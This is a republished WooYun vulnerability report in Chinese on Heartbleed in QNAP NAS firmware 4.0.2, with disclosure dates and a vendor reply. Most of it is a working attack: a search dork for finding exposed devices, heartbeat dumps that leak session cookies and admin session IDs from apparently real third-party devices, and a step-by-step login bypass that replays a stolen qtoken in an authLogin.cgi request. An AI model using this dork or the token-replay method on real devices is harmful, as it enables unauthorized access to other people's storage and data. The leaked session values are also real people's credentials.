某知名nas设备存在heartbleed(附利用技巧)

admin
admin
admin
140862
文章
117
评论
2015年4月26日16:58:52评论373 views字数 235阅读0分47秒阅读模式
摘要

2014-07-11: 细节已通知厂商并且等待厂商处理中
2014-07-14: 厂商已经确认,细节仅向厂商公开
2014-07-17: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-09-07: 细节向核心白帽子及相关领域专家公开
2014-09-17: 细节向普通白帽子公开
2014-09-27: 细节向实习白帽子公开
2014-10-07: 细节向公众公开

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2014-67896

漏洞标题: 某知名nas设备存在heartbleed(附利用技巧) 某知名nas设备存在heartbleed(附利用技巧)

相关厂商: CNCERT

漏洞作者: if、so某知名nas设备存在heartbleed(附利用技巧)

提交时间: 2014-07-11 16:04

公开时间: 2014-10-07 16:06

漏洞类型: 默认配置不当

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

5人收藏

漏洞详情

披露状态:

2014-07-11: 细节已通知厂商并且等待厂商处理中
2014-07-14: 厂商已经确认,细节仅向厂商公开
2014-07-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-07: 细节向核心白帽子及相关领域专家公开
2014-09-17: 细节向普通白帽子公开
2014-09-27: 细节向实习白帽子公开
2014-10-07: 细节向公众公开

简要描述:

某知名nas设备存在heartbleed,附利用技巧

详细说明:

威联通科技股份有限公司(QNAP Systems, Inc.),是极少数以商用服务器获得世界认同的台湾跨国企业,旗下的NAS产品线在欧美市场的销售量已经居于领导性地位,成为华人于欧美市场成功开创自有品牌的典范。公司专注于提供专业级的NAS网络储存装置、NVR安全监控解决方案及NMP网络多媒体播放器。

旗下的QNAP NAS turbo 4.0.2版本存在heartbleed,(只知道这个版本)

Google hack:

code 区域 
inurl:inurl:cgi-bin/QTS.cgi?count=

搜索出来了2w多结果

某知名nas设备存在heartbleed(附利用技巧)

从第一个开始测试

code 区域 
Connecting...
 Sending Client Hello...
 Waiting for Server Hello...
  ... received message: type = 22, ver = 0302, length = 58
  ... received message: type = 22, ver = 0302, length = 1208
  ... received message: type = 22, ver = 0302, length = 525
  ... received message: type = 22, ver = 0302, length = 4
 Sending heartbeat request...
  ... received message: type = 24, ver = 0302, length = 16384
 Received heartbeat response:
   0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
   0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
   0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
   0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
   0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
   0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
   0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
   0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
   0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
   0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
   00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
   00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
   00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
   00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 0D 0A 44 7B  ....#.........D{
   00e0: EF 2F C7 08 29 7B 47 32 40 89 CF 03 9F 56 4C CC  ./..){[email protected].
   00f0: 6D 4D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D  mM..............
   0100: 01 00 02 00 03 00 0F 00 10 00 11 00 23 00 00 00  ............#...
code 区域 
Connecting...
 Sending Client Hello...
 Waiting for Server Hello...
  ... received message: type = 22, ver = 0302, length = 58
  ... received message: type = 22, ver = 0302, length = 1208
  ... received message: type = 22, ver = 0302, length = 525
  ... received message: type = 22, ver = 0302, length = 4
 Sending heartbeat request...
  ... received message: type = 24, ver = 0302, length = 16384
 Received heartbeat response:
   0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
   0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
   0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
   0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
   0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
   0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
   0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
   0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
   0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
   0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
   00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
   00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
   00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
   00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2C CD 2E 7B  ....#.......,..{
   00e0: EB 35 1F AD A9 F5 15 B5 33 5F A9 9E 14 6E C5 A4  .5......3_...n..
   00f0: F0 73 55 0C E8 E6 9A 6E A2 A1 D3 13 83 1F 11 73  .sU....n.......s
   0100: 4D 05 FD 51 6A 1E 41 67 65 6E 74 3A 20 4D 6F 7A  M..Qj.Agent: Moz
   0110: 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61 74  illa/5.0 (compat
   0120: 69 62 6C 65 3B 20 47 6F 6F 67 6C 65 62 6F 74 2F  ible; Googlebot/
   0130: 32 2E 31 3B 20 2B 68 74 74 70 3A 2F 2F 77 77 77  2.1; +http://www
   0140: 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 62 6F 74 2E  .**.**.**.**/bot.
   0150: 68 74 6D 6C 29 0D 0A 0D 0A 06 AE F6 5B BD 4B E8  html).......[.K.
   0160: 26 A2 3A 47 10 1F A3 E6 10 2A 9D 51 0C 74 2E 68  &.:G.....*.Q.t.h
   0170: 74 6D 6C 29 0D 0A 0D 0A BE CD EE 1B 91 85 9D 77  tml)...........w
   0180: 9E 76 98 5C C9 FE 16 0A 33 C3 AF 2A 00 00 00 00  .v./....3..*....
code 区域 
... received message: type = 22, ver = 0302, length = 58
  ... received message: type = 22, ver = 0302, length = 1208
  ... received message: type = 22, ver = 0302, length = 525
  ... received message: type = 22, ver = 0302, length = 4
 Sending heartbeat request...
  ... received message: type = 24, ver = 0302, length = 16384
 Received heartbeat response:
   0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
   0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
   0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
   0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
   0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
   0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
   0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
   0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
   0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
   0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
   00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
   00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
   00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
   00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 4D B3 0E 3C  ....#.......M..<
   00e0: AE 89 EE 2A 87 46 76 2B BB 75 3C 29 94 53 EA 95  ...*.Fv+.u<).S..
   00f0: BB 45 5C E3 15 FB F9 42 2B 97 33 C8 BB 1C B0 5D  .E/....B+.3....]
   0100: 95 D7 0A 15 5F FB 43 6F 6E 6E 65 63 74 69 6F 6E  ...._.Connection
   0110: 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 0D 0A  : keep-alive....
   0120: 55 BF AC D3 9E 14 10 FB D7 0F 19 F6 64 B4 15 B6  U...........d...
   0130: 8F AC 23 9E 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  ..#.............
   0140: 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28  t: Mozilla/5.0 (
   0150: 63 6F 6D 70 61 74 69 62 6C 65 3B 20 47 6F 6F 67  compatible; Goog
   0160: 6C 65 62 6F 74 2F 32 2E 31 3B 20 2B 68 74 74 70  lebot/2.1; +http
   0170: 3A 2F 2F 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F  ://www.google.co
   0180: 6D 2F 62 6F 74 2E 68 74 6D 6C 29 0D 0A 41 63 63  m/bot.html)..Acc
   0190: 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A  ept-Encoding: gz
   01a0: 69 70 2C 64 65 66 6C 61 74 65 0D 0A 0D 0A 26 72  ip,deflate....&r
   01b0: 3D 30 2E 32 38 36 36 34 32 39 32 34 34 31 36 38  =0.2866429244168
   01c0: 31 30 33 F1 BD 91 9B 20 BD 71 05 89 21 2C D5 61  103.... .q..!,.a
code 区域 
Connecting...
 Sending Client Hello...
 Waiting for Server Hello...
  ... received message: type = 22, ver = 0302, length = 58
  ... received message: type = 22, ver = 0302, length = 1208
  ... received message: type = 22, ver = 0302, length = 525
  ... received message: type = 22, ver = 0302, length = 4
 Sending heartbeat request...
  ... received message: type = 24, ver = 0302, length = 16384
 Received heartbeat response:
   0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...
   0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
   0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
   0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
   0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
   0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
   0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
   0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
   0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
   0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
   00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
   00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
   00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
   00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 32 30 31 33  ....#.......2013
   00e0: 30 37 32 36 0D 0A 41 63 63 65 70 74 2D 4C 61 6E  0726..Accept-Lan
   00f0: 67 75 61 67 65 3A 20 7A 68 2D 54 57 0D 0A 41 63  guage: zh-TW..Ac
   0100: 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67  cept-Encoding: g
   0110: 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73  zip, deflate..Us
   0120: 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C  er-Agent: Mozill
   0130: 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C  a/4.0 (compatibl
   0140: 65 3B 20 4D 53 49 45 20 37 2E 30 3B 20 57 69 6E  e; MSIE 7.0; Win
   0150: 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57  dows NT 6.1; WOW
   0160: 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B  64; Trident/7.0;
   0170: 20 53 4C 43 43 32 3B 20 2E 4E 45 54 20 43 4C 52   SLCC2; .NET CLR
   0180: 20 32 2E 30 2E 35 30 37 32 37 3B 20 2E 4E 45 54   2.0.50727; .NET
   0190: 20 43 4C 52 20 33 2E 35 2E 33 30 37 32 39 3B 20   CLR 3.5.30729; 
   01a0: 2E 4E 45 54 20 43 4C 52 20 33 2E 30 2E 33 30 37  .NET CLR 3.0.307
   01b0: 32 39 3B 20 4D 65 64 69 61 20 43 65 6E 74 65 72  29; Media Center
   01c0: 20 50 43 20 36 2E 30 3B 20 2E 4E 45 54 34 2E 30   PC 6.0; .NET4.0
   01d0: 43 3B 20 49 6E 66 6F 50 61 74 68 2E 33 3B 20 2E  C; InfoPath.3; .
   01e0: 4E 45 54 20 43 4C 52 20 31 2E 31 2E 34 33 32 32  NET CLR 1.1.4322
   01f0: 3B 20 2E 4E 45 54 34 2E 30 45 29 0D 0A 48 6F 73  ; .NET4.0E)..Hos
   0200: 74 3A 20 6E 61 73 2D 66 74 70 0D 0A 43 6F 6E 74  t: nas-ftp..Cont
   0210: 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 36 30 0D 0A  ent-Length: 60..
   0220: 44 4E 54 3A 20 31 0D 0A 43 6F 6E 6E 65 63 74 69  DNT: 1..Connecti
   0230: 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A  on: Keep-Alive..
   0240: 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6E  Cache-Control: n
   0250: 6F 2D 63 61 63 68 65 0D 0A 43 6F 6F 6B 69 65 3A  o-cache..Cookie:
   0260: 20 44 45 53 4B 54 4F 50 3D 31 3B 20 6E 61 73 5F   DESKTOP=1; nas_
   0270: 77 66 6D 5F 74 72 65 65 5F 78 3D 32 30 30 3B 20  wfm_tree_x=200; 
   0280: 6E 61 73 5F 32 5F 73 3D 6A 33 34 37 62 76 69 32  nas_2_s=j347bvi2
   0290: 3B 20 57 49 4E 44 4F 57 5F 4D 4F 44 45 3D 31 3B  ; WINDOW_MODE=1;
   02a0: 20 6E 61 73 5F 6C 61 6E 67 3D 45 4E 47 3B 20 73   nas_lang=ENG; s
   02b0: 6B 69 70 5F 49 45 5F 64 65 74 65 63 74 3D 31 3B  kip_IE_detect=1;
   02c0: 20 50 48 50 53 45 53 53 49 44 3D 37 38 36 35 63   PHPSESSID=7865c
   02d0: 65 63 66 39 65 63 63 37 39 63 36 39 66 32 39 30  ecf9ecc79c69f290
   02e0: 30 30 63 65 33 35 38 66 34 33 33 3B 20 4E 41 53  00ce358f433; NAS
   02f0: 5F 55 53 45 52 3D 61 64 6D 69 6E 3B 20 68 6F 6D  _USER=admin; hom
   0300: 65 3D 31 3B 20 4E 41 53 5F 53 49 44 3D 6A 33 34  e=1; NAS_SID=j34
   0310: 37 62 76 69 32 3B 20 73 68 6F 77 51 75 69 63 6B  7bvi2; showQuick
   0320: 53 74 61 72 74 3D 31 3B 20 51 54 3D 31 34 30 34  Start=1; QT=1404
   0330: 38 38 31 37 34 31 38 33 30 0D 0A 0D 0A C9 5F 06  881741830....._.
   0340: 2B FB 50 B6 9F B8 A6 1B C2 48 D0 AC 35 8F C8 1F  +.P......H..5...
   0350: F8 B0 9E F6 D4 55 0D 0B 03 17 31 96 7D 02 02 02  .....U....1.}...

第一页随便就测出了5,6个,至于其他没测试出,说明防火墙屏蔽了443端口,毕竟有些机器是内网映射出来的。

利用:现成的cookie是无法登入的,利用花了好多时间才搞定。

某知名nas设备存在heartbleed(附利用技巧)

当多尝试几次抓取到cookie数据时,这里指的完整数据,是带有token的,这是关键,然后找到nas_1_u,后面是base64编码,解出来就是用户名,有时候会直接有nas_user参数,我这个cookie里面没有。当知道用户名和token就可以伪造正常登陆nas系统了。

某知名nas设备存在heartbleed(附利用技巧)

首先随便输入信息,抓个包

code 区域 
POST /cgi-bin/authLogin.cgi HTTP/1.1
 Host: xxx:8080
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://xxx/cgi-bin/login.html?**.**.**.**30912
 Content-Length: 52
 Cookie: DESKTOP=1; PHPSESSID=6ce5874ada5f49475b4d3363e1009b7d
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache
 
 user=123&serviceKey=1&pwd=MTIz&&r=0.6503833241116638

然后替换用户名,并且加上token

code 区域 
user=Mediaxxx&serviceKey=1&remme=1&qtoken=8e0398b48e33b12d2431a2994b25161d

然后burp一直forward,然后就登陆进去了

某知名nas设备存在heartbleed(附利用技巧)

漏洞证明:

某知名nas设备存在heartbleed(附利用技巧)

修复方案:

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-07-14 10:28

厂商回复:

在此前的Openssl漏洞中,CNVD已经完成测试。参见此前的CNVD微博公告。同时感谢白帽子的特征提取工作,CNVD已经收录该特征。目前,由于未直接建立软件生产厂商联系渠道,待进一步处置。按通用软件衍生漏洞评分,ran k12

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-07-09 17:45 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    关注下,我是冲着猥琐的利用技巧来的

  2. 2014-07-10 01:07 | if、so 某知名nas设备存在heartbleed(附利用技巧) ( 核心白帽子 | Rank:1204 漏洞数:104 | Enjoy Hacking)

    0

    @cncert 4.0.3好像也存在,不过关键字不知道怎么提取

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin